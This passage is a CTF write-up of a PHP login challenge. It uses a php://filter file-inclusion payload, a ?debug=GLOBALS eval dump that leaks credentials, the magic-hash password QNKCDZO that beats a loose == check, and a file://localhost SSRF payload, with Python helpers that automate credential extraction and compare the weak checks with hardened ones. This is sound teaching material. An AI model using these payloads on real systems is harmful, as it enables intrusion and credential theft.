payload (the `action` parameter includes files, so a php://filter wrapper leaks source instead of executing it): action=php://filter/read=convert.base64-encode/resource=login.php
Base64-decoding the response gives login.php:
<?php
include "config.php";   // defines $admin_username and $admin_password (an md5 hex digest)
session_start();

// Only for debug
if (DEBUG_MODE) {
    if (isset($_GET['debug'])) {
        $debug = $_GET['debug'];
        // Only a bare identifier is accepted, so no code can be injected...
        if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
            die("args error!");
        }
        // ...but $debug is interpolated into the double-quoted string, so ?debug=GLOBALS
        // evaluates var_dump($GLOBALS); and dumps every global, config.php values included
        eval("var_dump($$debug);");
    }
}

if (isset($_SESSION['username'])) {
    header("Location: admin.php");
    exit();
} else {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        // Loose comparison (==): two numeric strings such as "0e..." compare as 0 == 0
        if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username) {
            $_SESSION['username'] = $_POST['username'];
            header("Location: admin.php");
            exit();
        } else {
            echo "用户名或密码错误";   // "wrong username or password"
        }
    }
}
?>
From this we can see that the author keeps the account and password in config.php, so what remains is to read that file.

But the author left in one important thing: the debug branch. The value of ?debug= is placed into eval("var_dump($$debug);"). Because that is a double-quoted string, PHP interpolates $debug into it first, so the code that actually runs is var_dump($<name>); for whatever identifier we supplied (the same effect as a variable variable). The regex only restricts the name to identifier characters; it does not restrict which variable we name. Naming the superglobal GLOBALS dumps every global variable, which includes the values config.php defined. The parameter is read from GET, so the request is login.php?debug=GLOBALS:
array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "1hllumqt039vf9384rs80i5l8q" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { }
["GLOBALS"]=> array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "1hllumqt039vf9384rs80i5l8q" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> *RECURSION* } }
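As an added example (not part of the original write-up), the following Python models the debug gate and automates the harvesting step: it applies the same identifier regex that login.php uses, builds the GET request, and pulls the config.php values out of the var_dump output. The target base URL is a placeholder, and the sample dump is constructed from the response shown above.

```python
import re
from urllib.parse import urlencode

# login.php's filter on ?debug=, copied verbatim: a bare PHP identifier only.
DEBUG_NAME_RE = re.compile(r"^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$")

# One string-typed entry of var_dump() output, e.g.  ["admin_password"]=> string(32) "0e11..."
VARDUMP_STRING_RE = re.compile(
    r'\["([A-Za-z_][A-Za-z0-9_]*)"\]=>\s*string\(\d+\)\s*"([^"]*)"'
)

# Constructed sample: the body the page shows for ?debug=GLOBALS, abridged.
SAMPLE_DUMP = (
    'array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } '
    '["_POST"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" '
    '["admin_password"]=> string(32) "0e114902927253523756713132279690" '
    '["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } '
    '["GLOBALS"]=> array(9) { ["admin_username"]=> string(7) "Cosmos!" '
    '["GLOBALS"]=> *RECURSION* } }'
)


def passes_debug_check(name: str) -> bool:
    """True if login.php would accept this value and run eval("var_dump($<name>);")."""
    return DEBUG_NAME_RE.match(name) is not None


def debug_url(base: str, name: str) -> str:
    """Build the GET request that triggers the dump (base is a hypothetical target URL)."""
    return f"{base}/login.php?{urlencode({'debug': name})}"


def extract_strings(vardump: str) -> dict:
    """Map every string-typed key in var_dump output to its value."""
    return {key: value for key, value in VARDUMP_STRING_RE.findall(vardump)}


def harvest_credentials(vardump: str) -> tuple:
    """Pull the config.php values out of a $GLOBALS dump; raises if they are absent."""
    found = extract_strings(vardump)
    try:
        return found["admin_username"], found["admin_password"]
    except KeyError as missing:
        raise ValueError(f"dump does not contain {missing}") from None


if __name__ == "__main__":
    # The regex stops code injection but not the choice of variable name.
    for candidate in ("GLOBALS", "_SESSION", "GLOBALS);phpinfo(", "1abc"):
        print(f"{candidate!r:25} accepted={passes_debug_check(candidate)}")
    print(debug_url("http://target.example", "GLOBALS"))
    print(harvest_credentials(SAMPLE_DUMP))
```

Note that the regex does exactly what the author intended (no code after the identifier gets through); the flaw is that any identifier is a valid variable name, and superglobals like GLOBALS, _SESSION or _SERVER are all reachable.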
admin_username: Cosmos!, admin_password: 0e114902927253523756713132279690. The login compares the md5 of the submitted password against this stored hash, but it does so with ==, PHP's loose comparison, so we do not need to recover the original password.
Any string whose md5 is also of the form "0e" followed only by digits will do, for example QNKCDZO: PHP treats both "0e..." strings as numeric strings with the value 0, so they compare equal.
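As an added example (not part of the original write-up), this Python models the comparison that login.php performs and checks candidate "magic hash" strings against the page's stored digest. The php_loose_eq function is a model of PHP 8's == on two strings, written here for illustration, not PHP's own code.

```python
import hashlib
import re
from typing import Iterable, Iterator

# A "magic" md5: a hex digest of the form 0e<digits only>, which PHP parses as the float 0.0
MAGIC_MD5_RE = re.compile(r"^0e[0-9]+$")

# PHP 8 numeric-string grammar: optional surrounding whitespace, sign, decimal part, exponent
PHP_NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

# From the write-up: the md5 of the real admin password, recovered from the $GLOBALS dump
ADMIN_PASSWORD_MD5 = "0e114902927253523756713132279690"


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(s: str) -> bool:
    return MAGIC_MD5_RE.match(md5_hex(s)) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP's == on two strings (PHP 8 rules): if both are numeric strings they are
    compared as numbers, otherwise byte-wise. Two 0e... strings therefore give 0.0 == 0.0."""
    if PHP_NUMERIC_RE.match(a) and PHP_NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def login_accepts(candidate: str, strict: bool = False) -> bool:
    """login.php's password check: == as written on the page, === as the fix."""
    digest = md5_hex(candidate)
    if strict:
        return digest == ADMIN_PASSWORD_MD5
    return php_loose_eq(ADMIN_PASSWORD_MD5, digest)


def find_magic(candidates: Iterable[str]) -> Iterator[str]:
    """Yield the candidates whose md5 is magic. Against random input a hit needs roughly
    1/256 * (10/16)^30 luck, i.e. on the order of 3e8 attempts, so in practice a
    wordlist of known magic strings is used instead of a fresh search."""
    for c in candidates:
        if is_magic_md5(c):
            yield c


if __name__ == "__main__":
    for pw in ("QNKCDZO", "240610708", "password"):
        print(pw, md5_hex(pw), "loose:", login_accepts(pw),
              "strict:", login_accepts(pw, strict=True))
```

With strict=True (the === fix, or hash_equals()) none of the magic strings pass; the stored hash of the real password is still compared, but only byte for byte.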
Logging in with Cosmos! / QNKCDZO takes us to the admin page, admin.php:
<?php
include "config.php";
session_start();
if (!isset($_SESSION['username'])) {
    header('Location: index.php');
    exit();
}

function insert_img() {
    if (isset($_POST['img_url'])) {
        $img_url = @$_POST['img_url'];
        $url_array = parse_url($img_url);
        // Only the host component is checked; the scheme is not, so file:// and others pass
        if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
            return false;
        }
        // The request is sent before the URL is validated (SSRF)
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $img_url);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        $res = curl_exec($c);
        curl_close($c);
        $avatar = base64_encode($res);
        // Validation happens only after the fetch has already completed
        if (filter_var($img_url, FILTER_VALIDATE_URL)) {
            return $avatar;
        }
    } else {
        return base64_encode(file_get_contents("static/logo.png"));
    }
}
?>
From other people's write-ups:
payload (POST img_url): file://localhost/..//flag
The point is that only the host is validated, never the scheme. curl accepts file:// URLs whose host is localhost (or empty), parse_url reports host=localhost, so the check passes and curl reads /..//flag from the server's own filesystem, which resolves to /flag; the contents come back base64-encoded as the avatar.
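As an added example (not code from the original challenge), this Python puts admin.php's host-only check beside a hardened validator and runs both over a few constructed probe URLs. It assumes that Python's urlsplit splits these particular URLs the same way PHP's parse_url does (true for the hosts, schemes and ports used here); the hardened allow list drops localhost, since fetching loopback services is itself SSRF.

```python
from urllib.parse import urlsplit

# Hosts admin.php accepts (from the page) and the hardened allow list used below
PAGE_HOSTS = {"localhost", "timgsa.baidu.com"}
HARDENED_HOSTS = {"timgsa.baidu.com"}
ALLOWED_SCHEMES = {"http", "https"}


def page_check(img_url: str) -> bool:
    """Mirror of admin.php's gate: only the host component is compared, the scheme is ignored."""
    return urlsplit(img_url).hostname in PAGE_HOSTS


def hardened_check(img_url: str) -> bool:
    """Allow-list scheme, host, port and userinfo, and do it before any request is sent."""
    parts = urlsplit(img_url)
    if parts.scheme not in ALLOWED_SCHEMES:          # blocks file://, dict://, gopher://, ...
        return False
    if parts.hostname not in HARDENED_HOSTS:
        return False
    if parts.username is not None or parts.password is not None:   # http://good@evil/
        return False
    try:
        port = parts.port                              # raises on a malformed port
    except ValueError:
        return False
    return port in (None, 80, 443)


# Constructed probes: the page's payload, a few classic bypass shapes, and a legitimate image URL
PROBES = [
    "file://localhost/..//flag",
    "dict://timgsa.baidu.com:11211/stats",
    "http://timgsa.baidu.com@127.0.0.1/",
    "http://timgsa.baidu.com:8080/",
    "http://evil.example/",
    "https://timgsa.baidu.com/img/logo.png",
]


def compare(probes=PROBES) -> list:
    """Return (url, accepted_by_page_check, accepted_by_hardened_check) for each probe."""
    return [(u, page_check(u), hardened_check(u)) for u in probes]


if __name__ == "__main__":
    for url, weak, strong in compare():
        print(f"{url:45} page={weak!s:5} hardened={strong}")
```

Even with the stricter check, the curl call itself should be pinned as well: set CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS to CURLPROTO_HTTP | CURLPROTO_HTTPS so a redirect or an unexpected scheme cannot reach file:// or other handlers, and keep CURLOPT_FOLLOWLOCATION off unless redirects are re-validated.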
Reference write-up:
https://blog.csdn.net/weixin_43900387/article/details/104105765